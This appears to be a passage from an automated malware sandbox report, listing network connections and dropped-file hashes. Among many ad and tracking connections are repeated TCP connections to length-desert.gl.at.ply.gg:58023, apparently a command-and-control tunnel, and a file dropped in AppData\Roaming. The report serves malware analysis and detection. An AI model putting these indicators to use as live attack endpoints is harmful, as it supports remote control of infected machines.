US 8.8.8.8:53 244.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 239.188.21.2.in-addr.arpa udp
US 8.8.8.8:53 171.78.68.104.in-addr.arpa udp
US 8.8.8.8:53 115.158.57.154.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com tcp
GB 172.217.169.65:443 f3dc34e6d64f2536c54ebf2388fc1464.safeframe.googlesyndication.com tcp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.169.65:443 f3dc34e6d64f2536c54ebf2388fc1464.safeframe.googlesyndication.com udp
US 18.245.194.122:443 c.amazon-adsystem.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
US 216.239.36.181:443 analytics-alv.google.com tcp
US 18.245.194.122:443 c.amazon-adsystem.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 216.239.36.181:443 analytics-alv.google.com udp
FR 18.155.124.109:443 aax.amazon-adsystem.com tcp
GB 3.162.20.23:443 cdn.browsiprod.com tcp
US 104.22.52.173:443 cdn.hadronid.net tcp
FR 52.84.174.75:443 config.aps.amazon-adsystem.com tcp
DE 23.67.137.210:443 secure.cdn.fastclick.net tcp
FR 18.155.129.56:443 tags.crwdcntrl.net tcp
US 104.22.53.86:443 cdn.id5-sync.com tcp
DE 23.67.137.210:443 secure.cdn.fastclick.net tcp
GB 142.250.187.202:443 imasdk.googleapis.com tcp
US 52.34.87.71:443 events.browsiprod.com tcp
US 104.22.4.69:443 id.hadron.ad.gt.cdn.cloudflare.net tcp
US 104.22.4.69:443 id.hadron.ad.gt.cdn.cloudflare.net tcp
FR 3.162.38.107:443 yield-manager.browsiprod.com tcp
GB 142.250.187.202:443 imasdk.googleapis.com udp
IE 54.77.98.227:443 bcp.crwdcntrl.net tcp
US 8.8.8.8:53 52.171.252.37.in-addr.arpa udp
US 8.8.8.8:53 175.18.21.2.in-addr.arpa udp
US 8.8.8.8:53 182.186.46.96.in-addr.arpa udp
US 8.8.8.8:53 65.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 122.194.245.18.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 181.36.239.216.in-addr.arpa udp
US 8.8.8.8:53 109.124.155.18.in-addr.arpa udp
US 8.8.8.8:53 23.20.162.3.in-addr.arpa udp
US 8.8.8.8:53 173.52.22.104.in-addr.arpa udp
US 8.8.8.8:53 75.174.84.52.in-addr.arpa udp
US 8.8.8.8:53 56.129.155.18.in-addr.arpa udp
US 8.8.8.8:53 86.53.22.104.in-addr.arpa udp
US 8.8.8.8:53 210.137.67.23.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 69.4.22.104.in-addr.arpa udp
US 8.8.8.8:53 107.38.162.3.in-addr.arpa udp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net tcp
GB 216.58.204.70:443 s0.2mdn.net udp
US 104.22.4.69:443 a.ad.gt.cdn.cloudflare.net tcp
NL 89.207.16.146:443 proc.ad.cpe.dotomi.com tcp
US 96.46.186.15:443 track-sc.avplayer.com tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org udp
NL 69.173.156.148:443 token.rubiconproject.com tcp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
GB 216.58.204.86:443 i.ytimg.com udp
US 34.98.64.218:443 monetizemore-d.openx.net tcp
US 151.101.1.108:443 prod.appnexus.map.fastly.net tcp
US 34.98.64.218:443 monetizemore-d.openx.net udp
GB 216.58.213.6:443 static.doubleclick.net tcp
GB 216.58.212.202:443 jnn-pa.googleapis.com tcp
GB 216.58.212.202:443 jnn-pa.googleapis.com tcp
GB 216.58.213.6:443 static.doubleclick.net udp
GB 216.58.212.202:443 jnn-pa.googleapis.com udp
GB 216.58.212.202:443 jnn-pa.googleapis.com udp
GB 142.250.200.2:443 pubads.g.doubleclick.net tcp
GB 142.250.200.2:443 pubads.g.doubleclick.net udp
DE 216.58.206.35:443 csi.gstatic.com tcp
DE 216.58.206.35:443 csi.gstatic.com udp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
US 173.0.146.5:443 servx.opamarketplace.com tcp
US 96.46.186.186:443 track4.aniview.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 172.217.169.65:443 c9eec474f5683bd5cb86e31c73d28b6a.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 c9eec474f5683bd5cb86e31c73d28b6a.safeframe.googlesyndication.com udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
US 34.98.64.218:443 monetizemore-d.openx.net udp
US 8.8.8.8:53 encrypted-tbn1.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 secure.cdn.fastclick.net udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
GB 142.250.179.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 e4536.g.akamaiedge.net udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 player.avplayer.com udp
GB 172.217.169.65:443 aab90b7c919bacd6285b3a743dabacf0.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 aab90b7c919bacd6285b3a743dabacf0.safeframe.googlesyndication.com udp
US 8.8.8.8:53 events.browsiprod.com udp
GB 142.250.187.202:443 jnn-pa.googleapis.com udp
GB 216.58.204.70:443 s0.2mdn.net udp
US 8.8.8.8:53 proc.ad.cpe.dotomi.com udp
GB 142.250.187.193:443 cdn.ampproject.org udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
GB 172.217.169.65:443 aab90b7c919bacd6285b3a743dabacf0.safeframe.googlesyndication.com udp
GB 142.250.179.238:443 play.google.com udp
DE 37.252.171.52:443 ib.adnxs.com tcp
DE 37.252.171.52:443 ib.adnxs.com tcp
US 34.98.64.218:443 monetizemore-d.openx.net udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 player.avplayer.com udp
US 8.8.8.8:53 secure.cdn.fastclick.net udp
US 8.8.8.8:53 tg1.aniview.com udp
GB 172.217.169.65:443 3965c679c54de0d81eaf900c52451f6d.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 3965c679c54de0d81eaf900c52451f6d.safeframe.googlesyndication.com udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 connect.facebook.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
GB 163.70.151.35:443 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net tcp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 a3.pubguru.net udp
US 8.8.8.8:53 a3.pubguru.net udp
GB 172.217.169.65:443 3965c679c54de0d81eaf900c52451f6d.safeframe.googlesyndication.com udp
GB 142.250.187.206:443 encrypted-tbn2.gstatic.com tcp
US 8.8.8.8:53 encrypted-tbn2.gstatic.com udp
GB 142.250.187.206:443 encrypted-tbn2.gstatic.com udp
GB 142.250.187.202:443 jnn-pa.googleapis.com udp
GB 142.250.187.193:443 cdn.ampproject.org udp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn1.gstatic.com udp
US 34.98.64.218:443 monetizemore-d.openx.net udp
DE 37.252.171.52:443 ib.adnxs.com tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 nextdllfiles.b-cdn.net udp
DE 18.193.100.165:443 a3.pubguru.net tcp
US 8.8.8.8:53 tg1.aniview.com udp
GB 142.250.179.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 player.avplayer.com udp
GB 142.250.187.238:443 www3.l.google.com udp
GB 172.217.169.65:443 acc736e4d9051564caea3a0ada33b6d0.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 acc736e4d9051564caea3a0ada33b6d0.safeframe.googlesyndication.com udp
BE 64.233.166.155:443 stats.g.doubleclick.net udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
US 8.8.8.8:53 secure.cdn.fastclick.net udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
US 8.8.8.8:53 cdn.browsiprod.com udp
US 8.8.8.8:53 yield-manager.browsiprod.com udp
GB 216.58.204.70:443 s0.2mdn.net udp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
GB 142.250.187.202:443 jnn-pa.googleapis.com udp
FR 185.93.2.245:443 download.zip.dll-files.com tcp
US 34.98.64.218:443 monetizemore-d.openx.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.35:443 star-mini.c10r.facebook.com udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
GB 163.70.151.21:443 scontent.xx.fbcdn.net udp
DE 18.193.100.165:443 a3.pubguru.net tcp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
SE 92.123.135.86:443 e16009.dscd.akamaiedge.net tcp
US 8.8.8.8:53 a3.pubguru.net udp
US 8.8.8.8:53 track-sc.avplayer.com udp
GB 172.217.169.65:443 e8366f176db9129c1b6a5873379ef634.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 e8366f176db9129c1b6a5873379ef634.safeframe.googlesyndication.com udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 www.facebook.com udp
FR 92.122.166.38:443 player.aniview.com tcp
GB 172.217.169.65:443 38f57c8a8cce2e787d640376bcefeb6b.safeframe.googlesyndication.com udp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
GB 142.250.179.234:443 jnn-pa.googleapis.com udp
SE 92.123.135.86:443 feed.avplayer.com tcp
GB 172.217.169.65:443 38f57c8a8cce2e787d640376bcefeb6b.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 38f57c8a8cce2e787d640376bcefeb6b.safeframe.googlesyndication.com udp
GB 142.250.187.202:443 jnn-pa.googleapis.com udp
US 216.239.36.181:443 analytics-alv.google.com udp
FR 92.122.166.38:443 player.aniview.com tcp
US 151.101.1.108:443 prod.appnexus.map.fastly.net tcp
US 34.98.64.218:443 monetizemore-d.openx.net udp
US 34.98.64.218:443 monetizemore-d.openx.net tcp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
US 151.101.1.108:443 prod.appnexus.map.fastly.net tcp
DE 37.252.171.52:443 ib.anycast.adnxs.com tcp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
SE 92.123.135.86:443 feed.avplayer.com tcp
US 8.8.8.8:53 player.avplayer.com udp
US 8.8.8.8:53 a3.pubguru.net udp
US 8.8.8.8:53 e16009.dscd.akamaiedge.net udp
US 8.8.8.8:53 e16009.dscd.akamaiedge.net udp
FR 92.122.166.38:443 player.avplayer.com tcp
GB 172.217.169.65:443 2471e15bd7d48f8099de5d026a7cf358.safeframe.googlesyndication.com tcp
GB 172.217.169.65:443 2471e15bd7d48f8099de5d026a7cf358.safeframe.googlesyndication.com udp
US 8.8.8.8:53 events.browsiprod.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 216.58.204.70:443 s0.2mdn.net udp
US 8.8.8.8:53 convex-rr.global.dual.dotomi.weighted.com.akadns.net udp
DE 162.19.138.120:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.82:443 lb.eu-1-id5-sync.com tcp
GB 2.21.189.169:443 e11385.dscd.akamaiedge.net tcp
GB 142.250.187.193:443 cdn.ampproject.org udp
US 151.101.1.108:443 prod.appnexus.map.fastly.net tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
DE 37.252.171.52:443 ib.anycast.adnxs.com tcp
US 35.244.181.201:443 prod.balrog.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ib.anycast.adnxs.com udp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
NL 185.89.210.20:443 ib.adnxs.com tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
NL 185.89.210.20:443 ib.adnxs.com tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
US 8.8.8.8:53 ib.anycast.adnxs.com udp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
US 8.8.8.8:53 content1.avplayer.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
NL 185.89.210.20:443 ib.anycast.adnxs.com tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 track-sc.avplayer.com udp
US 8.8.8.8:53 track-sc.avplayer.com udp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 2.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 track1.avplayer.com udp
US 8.8.8.8:53 track-sc.avplayer.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 length-desert.gl.at.ply.gg udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 track1.avplayer.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
US 8.8.8.8:53 content1.avplayer.com udp
US 8.8.8.8:53 a1970.dscd.akamai.net udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 147.185.221.19:58023 length-desert.gl.at.ply.gg tcp

Files

memory/3032-0-0x00000000002B0000-0x00000000002C6000-memory.dmp

memory/3032-1-0x00007FFFFD683000-0x00007FFFFD685000-memory.dmp

memory/3032-5-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp

memory/3032-6-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp

C:\Users\Admin\AppData\Roaming\9

MD5 d172c0a4ae3e8cef6a0a910bde62e195
SHA1 51139fc633fe81a66c8ed55081f92ec5256bd0bd
SHA256 94b65da2b5cc3728547f892a46e9c48c5d54477d10ea8e210304593acd3568e7
SHA512 d82c930a42fd623aeee51007453d201e96110b546f1fb34080fc6d4c1488d71b3828f5f1833d347993444e4d332aa00fbb7b8922fce676d220375470ad0fa467

memory/2572-9-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp

memory/2572-11-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp

